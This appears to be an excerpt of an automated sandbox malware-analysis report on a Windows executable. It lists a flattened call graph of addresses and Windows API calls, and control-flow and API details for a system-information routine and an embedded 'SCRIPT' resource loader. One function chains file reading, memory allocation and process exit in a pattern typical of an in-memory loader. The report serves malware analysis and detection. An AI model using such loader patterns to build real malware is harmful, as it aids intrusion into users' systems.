97873->97867 97875 c89a33 97873->97875 97876 c16246 CloseHandle 97874->97876 97877 c17510 53 API calls 97875->97877 97878 c89934 97876->97878 97883 c89a3a 97877->97883 97880 c17510 53 API calls 97878->97880 97885 c89940 97880->97885 97881 c89aa8 97881->97864 97888 c16246 CloseHandle 97881->97888 97882 c89abb 97929 c7cd57 30 API calls 97882->97929 97883->97882 97901 c89a6e 97883->97901 97886 c16246 CloseHandle 97885->97886 97889 c8994a 97886->97889 97887 c16270 22 API calls 97890 c89a7e 97887->97890 97891 c89b1e 97888->97891 97917 c15745 97889->97917 97893 c89a8e 97890->97893 97896 c1a8c7 22 API calls 97890->97896 97894 c16216 CloseHandle 97891->97894 97897 c133c6 22 API calls 97893->97897 97894->97864 97896->97893 97900 c89a9c 97897->97900 97898 c8995d 97925 c153de 27 API calls messages 97898->97925 97899 c899c2 97902 c16216 CloseHandle 97899->97902 97928 c7cd57 30 API calls 97900->97928 97901->97887 97902->97864 97905 c8996b 97926 c153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97905->97926 97907 c89972 97907->97873 97908 c7ccff 4 API calls 97907->97908 97908->97873 97910 c81e9f 97909->97910 97912 c81ea4 97909->97912 97930 c80f67 24 API calls __fread_nolock 97910->97930 97912->97872 97914 c7cd0e 97913->97914 97915 c7cd19 WriteFile 97913->97915 97931 c7cc37 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97914->97931 97915->97881 97918 c54035 97917->97918 97919 c1575c CreateFileW 97917->97919 97920 c1577b 97918->97920 97921 c5403b CreateFileW 97918->97921 97919->97920 97920->97898 97920->97899 97921->97920 97922 c54063 97921->97922 97932 c154c6 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97922->97932 97924 c5406e 97924->97920 97925->97905 97926->97907 97927->97873 97928->97881 97929->97881 97930->97912 97931->97915 97932->97924 97934 c1a961 22 API calls 97933->97934 97935 c792de 97934->97935 97936 c16270 22 API calls 97935->97936 97937 c792f2 97936->97937 97938 c78e54 41 API calls 97937->97938 97941 c79314 97937->97941 97940 c7930e 97938->97940 97939 c78e54 41 API calls 97939->97941 97940->97941 97959 c16d25 22 API calls __fread_nolock 97940->97959 97941->97939 97944 c16350 22 API calls 97941->97944 97945 c793b3 97941->97945 97947 c79397 97941->97947 97960 c16d25 22 API calls __fread_nolock 97941->97960 97944->97941 97946 c1a8c7 22 API calls 97945->97946 97948 c793c2 97945->97948 97946->97948 97961 c16d25 22 API calls __fread_nolock 97947->97961 97948->97621 97950 c793a7 97951 c16350 22 API calls 97950->97951 97951->97945 97952->97599 97953->97610 97954->97617 97955->97619 97956->97605 97957->97608 97958->97619 97959->97941 97960->97941 97961->97950 97962->97624 97963->97641 97964->97653 97965->97666 97966->97662 97967->97667 97968->97670 97969->97676 97971 c16270 22 API calls 97970->97971 97991 c19eb5 97971->97991 97972 c19fd2 97973 c1a4a1 22 API calls 97972->97973 97974 c19fec 97973->97974 97974->97682 97977 c1a6c3 22 API calls 97977->97991 97978 c5f7c4 98004 c796e2 84 API calls __wsopen_s 97978->98004 97979 c5f699 97985 c2fddb 22 API calls 97979->97985 97980 c1a405 97980->97974 98005 c796e2 84 API calls __wsopen_s 97980->98005 97984 c5f7d2 97986 c1a4a1 22 API calls 97984->97986 97987 c5f754 97985->97987 97988 c5f7e8 97986->97988 97989 c2fe0b 22 API calls 97987->97989 97988->97974 97994 c1a12c __fread_nolock 97989->97994 97991->97972 97991->97977 97991->97978 97991->97979 97991->97980 97992 c1a587 22 API calls 97991->97992 97993 c1a4a1 22 API calls 97991->97993 97991->97994 97995 c1aec9 22 API calls 97991->97995 97999 c14573 41 API calls _wcslen 97991->97999 98001 c148c8 23 API calls 97991->98001 98002 c149bd 22 API calls __fread_nolock 97991->98002 98003 c1a673 22 API calls 97991->98003 97992->97991 97993->97991 97994->97978 97994->97980 97996 c1a0db CharUpperBuffW 97995->97996 98000 c1a673 22 API calls 97996->98000 97998->97686 97999->97991 98000->97991 98001->97991 98002->97991 98003->97991 98004->97984 98005->97974 98007 c956a4 98006->98007 98012 c956f2 98006->98012 98008 c2fe0b 22 API calls 98007->98008 98009 c956c6 98008->98009 98010 c2fddb 22 API calls 98009->98010 98009->98012 98024 c80a59 22 API calls 98009->98024 98010->98009 98012->97693 98014 c80ada 98013->98014 98016 c80b13 98013->98016 98015 c2fddb 22 API calls 98014->98015 98014->98016 98015->98016 98016->97720 98017->97698 98018->97704 98019->97713 98020->97698 98021->97721 98022->97725 98023->97698 98024->98009 98025 c48402 98030 c481be 98025->98030 98028 c4842a 98035 c481ef try_get_first_available_module 98030->98035 98032 c483ee 98049 c427ec 26 API calls pre_c_initialization 98032->98049 98034 c48343 98034->98028 98042 c50984 98034->98042 98041 c48338 98035->98041 98045 c38e0b 40 API calls 2 library calls 98035->98045 98037 c4838c 98037->98041 98046 c38e0b 40 API calls 2 library calls 98037->98046 98039 c483ab 98039->98041 98047 c38e0b 40 API calls 2 library calls 98039->98047 98041->98034 98048 c3f2d9 20 API calls _free 98041->98048 98050 c50081 98042->98050 98044 c5099f 98044->98028 98045->98037 98046->98039 98047->98041 98048->98032 98049->98034 98053 c5008d ___scrt_is_nonwritable_in_current_image 98050->98053 98051 c5009b 98108 c3f2d9 20 API calls _free 98051->98108 98053->98051 98054 c500d4 98053->98054 98061 c5065b 98054->98061 98055 c500a0 98109 c427ec 26 API calls pre_c_initialization 98055->98109 98060 c500aa __wsopen_s 98060->98044 98111 c5042f 98061->98111 98064 c506a6 98129 c45221 98064->98129 98065 c5068d 98143 c3f2c6 20 API calls _free 98065->98143 98068 c50692 98144 c3f2d9 20 API calls _free 98068->98144 98069 c506ab 98070 c506b4 98069->98070 98071 c506cb 98069->98071 98145 c3f2c6 20 API calls _free 98070->98145 98142 c5039a CreateFileW 98071->98142 98075 c506b9 98146 c3f2d9 20 API calls _free 98075->98146 98076 c500f8 98110 c50121 LeaveCriticalSection __wsopen_s 98076->98110 98078 c50781 GetFileType 98079 c507d3 98078->98079 98080 c5078c GetLastError 98078->98080 98151 c4516a 21 API calls 3 library calls 98079->98151 98149 c3f2a3 20 API calls 2 library calls 98080->98149 98081 c50756 GetLastError 98148 c3f2a3 20 API calls 2 library calls 98081->98148 98083 c50704 98083->98078 98083->98081 98147 c5039a CreateFileW 98083->98147 98085 c5079a CloseHandle 98085->98068 98087 c507c3 98085->98087 98150 c3f2d9 20 API calls _free 98087->98150 98089 c50749 98089->98078 98089->98081 98091 c507f4 98093 c50840 98091->98093 98152 c505ab 72 API calls 4 library calls 98091->98152 98092 c507c8 98092->98068 98097 c5086d 98093->98097 98153 c5014d 72 API calls 4 library calls 98093->98153 98096 c50866 98096->98097 98098 c5087e 98096->98098 98099 c486ae __wsopen_s 29 API calls 98097->98099 98098->98076 98100 c508fc CloseHandle 98098->98100 98099->98076 98154 c5039a CreateFileW 98100->98154 98102 c50927 98103 c50931 GetLastError 98102->98103 98107 c5095d 98102->98107 98155 c3f2a3 20 API calls 2 library calls 98103->98155 98105 c5093d 98156 c45333 21 API calls 3 library calls 98105->98156 98107->98076 98108->98055 98109->98060 98110->98060 98112 c5046a 98111->98112 98113 c50450 98111->98113 98157 c503bf 98112->98157 98113->98112 98164 c3f2d9 20 API calls _free 98113->98164 98116 c5045f 98165 c427ec 26 API calls pre_c_initialization 98116->98165 98118 c504a2 98119 c504d1 98118->98119 98166 c3f2d9 20 API calls _free 98118->98166 98127 c50524 98119->98127 98168 c3d70d 26 API calls 2 library calls 98119->98168 98122 c5051f 98124 c5059e 98122->98124 98122->98127 98123 c504c6 98167 c427ec 26 API calls pre_c_initialization 98123->98167 98169 c427fc 11 API calls _abort 98124->98169 98127->98064 98127->98065 98128 c505aa 98130 c4522d ___scrt_is_nonwritable_in_current_image 98129->98130 98172 c42f5e EnterCriticalSection 98130->98172 98132 c4527b 98173 c4532a 98132->98173 98133 c45234 98133->98132 98134 c45259 98133->98134 98139 c452c7 EnterCriticalSection 98133->98139 98176 c45000 98134->98176 98137 c452a4 __wsopen_s 98137->98069 98139->98132 98140 c452d4 LeaveCriticalSection 98139->98140 98140->98133 98142->98083 98143->98068 98144->98076 98145->98075 98146->98068 98147->98089 98148->98068 98149->98085 98150->98092 98151->98091 98152->98093 98153->98096 98154->98102 98155->98105 98156->98107 98159 c503d7 98157->98159 98158 c503f2 98158->98118 98159->98158 98170 c3f2d9 20 API calls _free 98159->98170 98161 c50416 98171 c427ec 26 API calls pre_c_initialization 98161->98171 98163 c50421 98163->98118 98164->98116 98165->98112 98166->98123 98167->98119 98168->98122 98169->98128 98170->98161 98171->98163 98172->98133 98184 c42fa6 LeaveCriticalSection 98173->98184 98175 c45331 98175->98137 98177 c44c7d IsInExceptionSpec 20 API calls 98176->98177 98178 c45012 98177->98178 98182 c4501f 98178->98182 98185 c43405 11 API calls 2 library calls 98178->98185 98179 c429c8 _free 20 API calls 98181 c45071 98179->98181 98181->98132 98183 c45147 EnterCriticalSection 98181->98183 98182->98179 98183->98132 98184->98175 98185->98178 98186 c63a41 98190 c810c0 98186->98190 98188 c63a4c 98189 c810c0 53 API calls 98188->98189 98189->98188 98191 c810fa 98190->98191 98196 c810cd 98190->98196 98191->98188 98192 c810fc 98202 c2fa11 53 API calls 98192->98202 98194 c81101 98195 c17510 53 API calls 98194->98195 98197 c81108 98195->98197 98196->98191 98196->98192 98196->98194 98199 c810f4 98196->98199 98198 c16350 22 API calls 98197->98198 98198->98191 98201 c1b270 39 API calls 98199->98201 98201->98191 98202->98194 98203 c11cad SystemParametersInfoW 98204 14e1cc0 98205 14df910 GetPEB 98204->98205 98206 14e1d65 98205->98206 98218 14e1bb0 98206->98218 98208 14e1d8e CreateFileW 98210 14e1de2 98208->98210 98213 14e1ddd 98208->98213 98211 14e1df9 VirtualAlloc 98210->98211 98210->98213 98212 14e1e17 ReadFile 98211->98212 98211->98213 98212->98213 98214 14e1e32 98212->98214 98215 14e0bb0 13 API calls 98214->98215 98216 14e1e65 98215->98216 98217 14e1e88 ExitProcess 98216->98217 98217->98213 98219 14e1bb9 Sleep 98218->98219 98220 14e1bc7 98219->98220 98221 c11033 98226 c14c91 98221->98226 98225 c11042 98227 c1a961 22 API calls 98226->98227 98228 c14cff 98227->98228 98234 c13af0 98228->98234 98231 c14d9c 98232 c11038 98231->98232 98237 c151f7 22 API calls __fread_nolock 98231->98237 98233 c300a3 29 API calls __onexit 98232->98233 98233->98225 98238 c13b1c 98234->98238 98237->98231 98239 c13b0f 98238->98239 98240 c13b29 98238->98240 98239->98231 98240->98239 98241 c13b30 RegOpenKeyExW 98240->98241 98241->98239 98242 c13b4a RegQueryValueExW 98241->98242 98243 c13b80 RegCloseKey 98242->98243 98244 c13b6b 98242->98244 98243->98239 98244->98243 98245 c12e37 98246 c1a961 22 API calls 98245->98246 98247 c12e4d 98246->98247 98324 c14ae3 98247->98324 98249 c12e6b 98250 c13a5a 24 API calls 98249->98250 98251 c12e7f 98250->98251 98252 c19cb3 22 API calls 98251->98252 98253 c12e8c 98252->98253 98254 c14ecb 94 API calls 98253->98254 98255 c12ea5 98254->98255 98256 c52cb0 98255->98256 98257 c12ead 98255->98257 98258 c82cf9 80 API calls 98256->98258 98260 c1a8c7 22 API calls 98257->98260 98259 c52cc3 98258->98259 98261 c52ccf 98259->98261 98263 c14f39 68 API calls 98259->98263 98262 c12ec3 98260->98262 98265 c14f39 68 API calls 98261->98265 98338 c16f88 22 API calls 98262->98338 98263->98261 98267 c52ce5 98265->98267 98266 c12ecf 98268 c19cb3 22 API calls 98266->98268 98354 c13084 22 API calls 98267->98354 98269 c12edc 98268->98269 98339 c1a81b 41 API calls 98269->98339 98272 c12eec 98274 c19cb3 22 API calls 98272->98274 98273 c52d02 98355 c13084 22 API calls 98273->98355 98275 c12f12 98274->98275 98340 c1a81b 41 API calls 98275->98340 98278 c52d1e 98279 c13a5a 24 API calls 98278->98279 98280 c52d44 98279->98280 98356 c13084 22 API calls 98280->98356 98281 c12f21 98284 c1a961 22 API calls 98281->98284 98283 c52d50 98285 c1a8c7 22 API calls 98283->98285 98286 c12f3f 98284->98286 98287 c52d5e 98285->98287 98341 c13084 22 API calls 98286->98341 98357 c13084 22 API calls 98287->98357 98290 c12f4b 98342 c34a28 40 API calls 3 library calls 98290->98342 98291 c52d6d 98295 c1a8c7 22 API calls 98291->98295 98293 c12f59 98293->98267 98294 c12f63 98293->98294 98343 c34a28 40 API calls 3 library calls 98294->98343 98298 c52d83 98295->98298 98297 c12f6e 98297->98273 98299 c12f78 98297->98299 98358 c13084 22 API calls 98298->98358 98344 c34a28 40 API calls 3 library calls 98299->98344 98302 c52d90 98303 c12f83 98303->98278 98304 c12f8d 98303->98304 98345 c34a28 40 API calls 3 library calls 98304->98345 98306 c12f98 98307 c12fdc 98306->98307 98346 c13084 22 API calls 98306->98346 98307->98291 98308 c12fe8 98307->98308 98308->98302 98348 c163eb 22 API calls 98308->98348 98311 c12fbf 98313 c1a8c7 22 API calls 98311->98313 98312 c12ff8 98349 c16a50 22 API calls 98312->98349 98315 c12fcd 98313->98315 98347 c13084 22 API calls 98315->98347 98316 c13006 98350 c170b0 23 API calls 98316->98350 98320 c13021 98322 c13065 98320->98322 98351 c16f88 22 API calls 98320->98351 98352 c170b0 23 API calls 98320->98352 98353 c13084 22 API calls 98320->98353 98325 c14af0 __wsopen_s 98324->98325 98326 c16b57 22 API calls 98325->98326 98327 c14b22 98325->98327 98326->98327 98335 c14b58 98327->98335 98359 c14c6d 98327->98359 98329 c14c29 98330 c19cb3 22 API calls 98329->98330 98337 c14c5e 98329->98337 98332 c14c52 98330->98332 98331 c19cb3 22 API calls 98331->98335 98333 c1515f 22 API calls 98332->98333 98333->98337 98334 c14c6d 22 API calls 98334->98335 98335->98329 98335->98331 98335->98334 98336 c1515f 22 API calls 98335->98336 98336->98335 98337->98249 98338->98266 98339->98272 98340->98281 98341->98290 98342->98293 98343->98297 98344->98303 98345->98306 98346->98311 98347->98307 98348->98312 98349->98316 98350->98320 98351->98320 98352->98320 98353->98320 98354->98273 98355->98278 98356->98283 98357->98291 98358->98302 98360 c1aec9 22 API calls 98359->98360 98361 c14c78 98360->98361 98361->98327 98362 c13156 98365 c13170 98362->98365 98366 c13187 98365->98366 98367 c131eb 98366->98367 98368 c1318c 98366->98368 98406 c131e9 98366->98406 98370 c131f1 98367->98370 98371 c52dfb 98367->98371 98372 c13265 PostQuitMessage 98368->98372 98373 c13199 98368->98373 98369 c131d0 DefWindowProcW 98379 c1316a 98369->98379 98374 c131f8 98370->98374 98375 c1321d SetTimer RegisterWindowMessageW 98370->98375 98414 c118e2 10 API calls 98371->98414 98372->98379 98377 c131a4 98373->98377 98378 c52e7c 98373->98378 98380 c13201 KillTimer 98374->98380 98381 c52d9c 98374->98381 98375->98379 98383 c13246 CreatePopupMenu 98375->98383 98384 c52e68 98377->98384 98385 c131ae 98377->98385 98419 c7bf30 34 API calls ___scrt_fastfail 98378->98419 98410 c130f2 Shell_NotifyIconW ___scrt_fastfail 98380->98410 98387 c52dd7 MoveWindow 98381->98387 98388 c52da1 98381->98388 98382 c52e1c 98415 c2e499 42 API calls 98382->98415 98383->98379 98418 c7c161 27 API calls ___scrt_fastfail 98384->98418 98392 c52e4d 98385->98392 98393 c131b9 98385->98393 98387->98379 98395 c52da7 98388->98395 98396 c52dc6 SetFocus 98388->98396 98392->98369 98417 c70ad7 22 API calls 98392->98417 98399 c131c4 98393->98399 98400 c13253 98393->98400 98394 c52e8e 98394->98369 98394->98379 98395->98399 98401 c52db0 98395->98401 98396->98379 98397 c13214 98411 c13c50 DeleteObject DestroyWindow 98397->98411 98398 c13263 98398->98379 98399->98369 98416 c130f2 Shell_NotifyIconW ___scrt_fastfail 98399->98416 98412 c1326f 44 API calls ___scrt_fastfail 98400->98412 98413 c118e2 10 API calls 98401->98413 98406->98369 98408 c52e41 98409 c13837 49 API calls 98408->98409 98409->98406 98410->98397 98411->98379 98412->98398 98413->98379 98414->98382 98415->98399 98416->98408 98417->98406 98418->98398 98419->98394 98420 c303fb 98421 c30407 ___scrt_is_nonwritable_in_current_image 98420->98421 98449 c2feb1 98421->98449 98423 c3040e 98424 c30561 98423->98424 98428 c30438 98423->98428 98476 c3083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 98424->98476 98426 c30568 98477 c34e52 28 API calls _abort 98426->98477 98438 c30477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 98428->98438 98460 c4247d 98428->98460 98429 c3056e 98478 c34e04 28 API calls _abort 98429->98478 98433 c30576 98434 c30457 98436 c304d8 98468 c30959 98436->98468 98438->98436 98472 c34e1a 38 API calls 3 library calls 98438->98472 98440 c304de 98441 c304f3 98440->98441 98473 c30992 GetModuleHandleW 98441->98473 98443 c304fa 98443->98426 98444 c304fe 98443->98444 98445 c30507 98444->98445 98474 c34df5 28 API calls _abort 98444->98474 98475 c30040 13 API calls 2 library calls 98445->98475 98448 c3050f 98448->98434 98450 c2feba 98449->98450 98479 c30698 IsProcessorFeaturePresent 98450->98479 98452 c2fec6 98480 c32c94 10 API calls 3 library calls 98452->98480 98454 c2fecb 98455 c2fecf 98454->98455 98481 c42317 98454->98481 98455->98423 98458 c2fee6 98458->98423 98462 c42494 98460->98462 98461 c30a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 98463 c30451 98461->98463 98462->98461 98463->98434 98464 c42421 98463->98464 98465 c42450 98464->98465 98466 c30a8c __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 98465->98466 98467 c42479 98466->98467 98467->98438 98532 c32340 98468->98532 98470 c3096c GetStartupInfoW 98471 c3097f 98470->98471 98471->98440 98472->98436 98473->98443 98474->98445 98475->98448 98476->98426 98477->98429 98478->98433 98479->98452 98480->98454 98485 c4d1f6 98481->98485 98484 c32cbd 8 API calls 3 library calls 98484->98455 98486 c4d213 98485->98486 98487 c4d20f 98485->98487 98486->98487 98491 c44bfb 98486->98491 98503 c30a8c 98487->98503 98489 c2fed8 98489->98458 98489->98484 98492 c44c07 ___scrt_is_nonwritable_in_current_image 98491->98492 98510 c42f5e EnterCriticalSection 98492->98510 98494 c44c0e 98511 c450af 98494->98511 98496 c44c1d 98497 c44c2c 98496->98497 98524 c44a8f 29 API calls 98496->98524 98526 c44c48 LeaveCriticalSection _abort 98497->98526 98500 c44c27 98525 c44b45 GetStdHandle GetFileType 98500->98525 98501 c44c3d __wsopen_s 98501->98486 98504 c30a97 IsProcessorFeaturePresent 98503->98504 98505 c30a95 98503->98505 98507 c30c5d 98504->98507 98505->98489 98531 c30c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 98507->98531 98509 c30d40 98509->98489 98510->98494 98512 c450bb ___scrt_is_nonwritable_in_current_image 98511->98512 98513 c450df 98512->98513 98514 c450c8 98512->98514 98527 c42f5e EnterCriticalSection 98513->98527 98528 c3f2d9 20 API calls _free 98514->98528 98517 c450cd 98529 c427ec 26 API calls pre_c_initialization 98517->98529 98519 c45117 98530 c4513e LeaveCriticalSection _abort 98519->98530 98520 c450d7 __wsopen_s 98520->98496 98521 c450eb 98521->98519 98523 c45000 __wsopen_s 21 API calls 98521->98523 98523->98521 98524->98500 98525->98497 98526->98501 98527->98521 98528->98517 98529->98520 98530->98520 98531->98509 98533 c32357 98532->98533 98533->98470 98533->98533 98534 c11098 98539 c142de 98534->98539 98538 c110a7 98540 c1a961 22 API calls 98539->98540 98541 c142f5 GetVersionExW 98540->98541 98542 c16b57 22 API calls 98541->98542 98543 c14342 98542->98543 98544 c193b2 22 API calls 98543->98544 98546 c14378 98543->98546 98545 c1436c 98544->98545 98548 c137a0 22 API calls 98545->98548 98547 c1441b GetCurrentProcess IsWow64Process 98546->98547 98550 c537df 98546->98550 98549 c14437 98547->98549 98548->98546 98551 c53824 GetSystemInfo 98549->98551 98552 c1444f LoadLibraryA 98549->98552 98553 c14460 GetProcAddress 98552->98553 98554 c1449c GetSystemInfo 98552->98554 98553->98554 98556 c14470 GetNativeSystemInfo 98553->98556 98555 c14476 98554->98555 98557 c1109d 98555->98557 98558 c1447a FreeLibrary 98555->98558 98556->98555 98559 c300a3 29 API calls __onexit 98557->98559 98558->98557 98559->98538 98560 c1105b 98565 c1344d 98560->98565 98562 c1106a 98596 c300a3 29 API calls __onexit 98562->98596 98564 c11074 98566 c1345d __wsopen_s 98565->98566 98567 c1a961 22 API calls 98566->98567 98568 c13513 98567->98568 98569 c13a5a 24 API calls 98568->98569 98570 c1351c 98569->98570 98597 c13357 98570->98597 98573 c133c6 22 API calls 98574 c13535 98573->98574 98575 c1515f 22 API calls 98574->98575 98576 c13544 98575->98576 98577 c1a961 22 API calls 98576->98577 98578 c1354d 98577->98578 98579 c1a6c3 22 API calls 98578->98579 98580 c13556 RegOpenKeyExW 98579->98580 98581 c53176 RegQueryValueExW 98580->98581 98585 c13578 98580->98585 98582 c53193 98581->98582 98583 c5320c RegCloseKey 98581->98583 98584 c2fe0b 22 API calls 98582->98584 98583->98585 98595 c5321e _wcslen 98583->98595 98586 c531ac 98584->98586 98585->98562 98587 c15722 22 API calls 98586->98587 98588 c531b7 RegQueryValueExW 98587->98588 98589 c531d4 98588->98589 98592 c531ee messages 98588->98592 98590 c16b57 22 API calls 98589->98590 98590->98592 98591 c14c6d 22 API calls 98591->98595 98592->98583 98593 c19cb3 22 API calls 98593->98595 98594 c1515f 22 API calls 98594->98595 98595->98585 98595->98591 98595->98593 98595->98594 98596->98564 98598 c51f50 __wsopen_s 98597->98598 98599 c13364 GetFullPathNameW 98598->98599 98600 c13386 98599->98600 98601 c16b57 22 API calls 98600->98601 98602 c133a4 98601->98602 98602->98573 98603 c1f7bf 98604 c1f7d3 98603->98604 98605 c1fcb6 98603->98605 98607 c1fcc2 98604->98607 98608 c2fddb 22 API calls 98604->98608 98640 c1aceb 23 API calls messages 98605->98640 98641 c1aceb 23 API calls messages 98607->98641 98610 c1f7e5 98608->98610 98610->98607 98611 c1f83e 98610->98611 98612 c1fd3d 98610->98612 98614 c21310 207 API calls 98611->98614 98629 c1ed9d messages 98611->98629 98642 c81155 22 API calls 98612->98642 98636 c1ec76 messages 98614->98636 98615 c2fddb 22 API calls 98615->98636 98617 c1fef7 98623 c1a8c7 22 API calls 98617->98623 98617->98629 98619 c64b0b 98644 c8359c 82 API calls __wsopen_s 98619->98644 98620 c64600 98625 c1a8c7 22 API calls 98620->98625 98620->98629 98623->98629 98624 c1a8c7 22 API calls 98624->98636 98625->98629 98627 c1fbe3 98627->98629 98631 c64bdc 98627->98631 98637 c1f3ae messages 98627->98637 98628 c1a961 22 API calls 98628->98636 98630 c300a3 29 API calls pre_c_initialization 98630->98636 98645 c8359c 82 API calls __wsopen_s 98631->98645 98633 c30242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 98633->98636 98634 c64beb 98646 c8359c 82 API calls __wsopen_s 98634->98646 98635 c301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 98635->98636 98636->98615 98636->98617 98636->98619 98636->98620 98636->98624 98636->98627 98636->98628 98636->98629 98636->98630 98636->98633 98636->98634 98636->98635 98636->98637 98638 c201e0 207 API calls 2 library calls 98636->98638 98639 c206a0 41 API calls messages 98636->98639 98637->98629 98643 c8359c 82 API calls __wsopen_s 98637->98643 98638->98636 98639->98636 98640->98607 98641->98612 98642->98629 98643->98629 98644->98629 98645->98634 98646->98629

                                                                                      Executed Functions

                                                                                      Function 00C142DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 234 c142de-c1434d call c1a961 GetVersionExW call c16b57 239 c53617-c5362a 234->239 240 c14353 234->240 241 c5362b-c5362f 239->241 242 c14355-c14357 240->242 243 c53631 241->243 244 c53632-c5363e 241->244 245 c53656 242->245 246 c1435d-c143bc call c193b2 call c137a0 242->246 243->244 244->241 247 c53640-c53642 244->247 250 c5365d-c53660 245->250 260 c143c2-c143c4 246->260 261 c537df-c537e6 246->261 247->242 249 c53648-c5364f 247->249 249->239 252 c53651 249->252 253 c53666-c536a8 250->253 254 c1441b-c14435 GetCurrentProcess IsWow64Process 250->254 252->245 253->254 259 c536ae-c536b1 253->259 257 c14494-c1449a 254->257 258 c14437 254->258 262 c1443d-c14449 257->262 258->262 263 c536b3-c536bd 259->263 264 c536db-c536e5 259->264 260->250 267 c143ca-c143dd 260->267 268 c53806-c53809 261->268 269 c537e8 261->269 272 c53824-c53828 GetSystemInfo 262->272 273 c1444f-c1445e LoadLibraryA 262->273 265 c536bf-c536c5 263->265 266 c536ca-c536d6 263->266 270 c536e7-c536f3 264->270 271 c536f8-c53702 264->271 265->254 266->254 274 c143e3-c143e5 267->274 275 c53726-c5372f 267->275 279 c537f4-c537fc 268->279 280 c5380b-c5381a 268->280 276 c537ee 269->276 270->254 277 c53715-c53721 271->277 278 c53704-c53710 271->278 281 c14460-c1446e GetProcAddress 273->281 282 c1449c-c144a6 GetSystemInfo 273->282 284 c5374d-c53762 274->284 285 c143eb-c143ee 274->285 286 c53731-c53737 275->286 287 c5373c-c53748 275->287 276->279 277->254 278->254 279->268 280->276 288 c5381c-c53822 280->288 281->282 289 c14470-c14474 GetNativeSystemInfo 281->289 283 c14476-c14478 282->283 294 c14481-c14493 283->294 295 c1447a-c1447b FreeLibrary 283->295 292 c53764-c5376a 284->292 293 c5376f-c5377b 284->293 290 c53791-c53794 285->290 291 c143f4-c1440f 285->291 286->254 287->254 288->279 289->283 290->254 298 c5379a-c537c1 290->298 296 c14415 291->296 297 c53780-c5378c 291->297 292->254 293->254 295->294 296->254 297->254 299 c537c3-c537c9 298->299 300 c537ce-c537da 298->300 299->254 300->254
                                                                                      APIs
                                                                                      • GetVersionExW.KERNEL32(?), ref: 00C1430D
                                                                                        • Part of subcall function 00C16B57: _wcslen.LIBCMT ref: 00C16B6A
                                                                                      • GetCurrentProcess.KERNEL32(?,00CACB64,00000000,?,?), ref: 00C14422
                                                                                      • IsWow64Process.KERNEL32(00000000,?,?), ref: 00C14429
                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00C14454
                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00C14466
                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00C14474
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00C1447B
                                                                                      • GetSystemInfo.KERNEL32(?,?,?), ref: 00C144A0
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2042402239.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2042389816.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CAC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042474004.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042510016.0000000000CDC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2042524177.0000000000CE4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_c10000_BP-50C26_20241220_082241.jbxd
                                                                                      Similarity
                                                                                      • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                      • API String ID: 3290436268-3101561225
                                                                                      • Opcode ID: 9054fbac982b842a12c3b1c6c8d7eca24878a2d8242a3588b87d5245ace48925
                                                                                      • Instruction ID: 00ec2336ef1c543ad38023a5fa6d034a1c7892a599ea07c86de51bba0ab7d87e
                                                                                      • Opcode Fuzzy Hash: 9054fbac982b842a12c3b1c6c8d7eca24878a2d8242a3588b87d5245ace48925
                                                                                      • Instruction Fuzzy Hash: 14A1AF7A91A2C0CFC715C76978C07DD7FE46B27740B0C4899EC919BA32D2304AA8EB35
                                                                                      Function 00C142A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 553 c142a2-c142ba CreateStreamOnHGlobal 554 c142da-c142dd 553->554 555 c142bc-c142d3 FindResourceExW 553->555 556 c142d9 555->556 557 c535ba-c535c9 LoadResource 555->557 556->554 557->556 558 c535cf-c535dd SizeofResource 557->558 558->556 559 c535e3-c535ee LockResource 558->559 559->556 560 c535f4-c535fc 559->560 561 c53600-c53612 560->561 561->556
                                                                                      APIs
                                                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C150AA,?,?,00000000,00000000), ref: 00C142B2
                                                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C150AA,?,?,00000000,00000000), ref: 00C142C9
                                                                                      • LoadResource.KERNEL32(?,00000000,?,?,00C150AA,?,?,00000000,00000000,?,?,?,?,?,?,00C14F20), ref: 00C535BE
                                                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00C150AA,?,?,00000000,00000000,?,?,?,?,?,?,00C14F20), ref: 00C535D3
